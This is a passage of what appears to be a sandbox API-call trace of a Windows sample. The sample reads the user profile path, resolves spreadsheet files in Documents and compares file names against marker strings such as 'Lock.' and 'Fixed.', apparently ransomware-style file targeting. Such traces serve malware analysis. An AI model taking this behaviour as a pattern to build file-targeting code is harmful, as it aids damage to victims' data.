ftLastWriteTime.dwLowDateTime=0xb5d49130, ftLastWriteTime.dwHighDateTime=0x1d4c95f, nFileSizeHigh=0x0, nFileSizeLow=0x2a8f, dwReserved0=0x1e16, dwReserved1=0x4, cFileName="oh6dPV4.xlsx", cAlternateFileName="OH6DPV~1.XLS")) returned 0 [0265.548] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0265.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.549] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0265.549] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0265.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0265.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0265.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.550] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0265.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0265.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6a) returned 0x240c8d0 [0265.552] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/oh6dPV4.xlsx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oh6dPV4.xlsx", lpFilePart=0x8bf658*="oh6dPV4.xlsx") returned 0x34 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0265.552] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oh6dPV4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oh6dpv4.xlsx")) returned 0xffffffff [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.553] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0265.553] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.553] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0265.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OQOxXrKa.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QOxXrKa.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OxXrKa.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xXrKa.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XrKa.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rKa.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ka.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0265.554] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0265.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a) returned 0x24b3ce0 [0265.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0265.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OQOxXrKa.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QOxXrKa.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OxXrKa.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xXrKa.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XrKa.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rKa.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ka.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0265.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0265.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0265.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.557] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0265.557] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0265.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0265.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.557] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0265.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0265.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.558] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0265.560] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0265.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0265.561] RtlAllocateHeap 